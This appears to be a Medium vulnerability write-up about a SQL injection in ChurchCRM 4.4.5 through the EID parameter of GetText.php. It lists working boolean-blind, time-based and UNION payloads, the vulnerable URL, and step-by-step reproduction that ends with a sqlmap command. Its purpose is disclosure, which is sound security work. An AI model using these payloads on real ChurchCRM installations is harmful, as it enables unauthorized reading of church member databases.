ChurchCRM 4.4.5 — SQL Injection at GetText.php

Vulnerability Explanation:

ChurchCRM 4.4.5 was discovered to contain a SQL injection vulnerability via the EID parameter at /churchcrm/GetText.php

Affected Component:

http://ip_address:port/churchcrm/GetText.php?EID=2

Payload:

Parameter: EID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: EID=2 AND 5131=5131
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: EID=2 AND (SELECT 8794 FROM (SELECT(SLEEP(5)))vcYY)
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: EID=-8266 UNION ALL SELECT CONCAT(0x716a626a71,0x4f4247535a686a694a597a48694d4e6c76515974547872624f6b4d6642564f764752694c7461526b,0x7176767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

Tested on:

  1. ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5

Steps to attack:

  1. Login with an admin credential.

2. Go to the “Events” as shown in the picture and Click on the “List Church Events”

3. Click on Sermon Text.

4. We’ll found /churchcrm/GetText.php?EID=2.

5. Refresh pages again and intercept request with burp.

6.Create a text file with the content of the request.

7.Using sqlmap with our text file by the following the command below:

sqlmap -r GetText.req -p EID

8. We discovered SQL injection vulnerability via the EID parameter.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
GrimTheRipper

GrimTheRipper

You get the best out of others when you give the best of yourself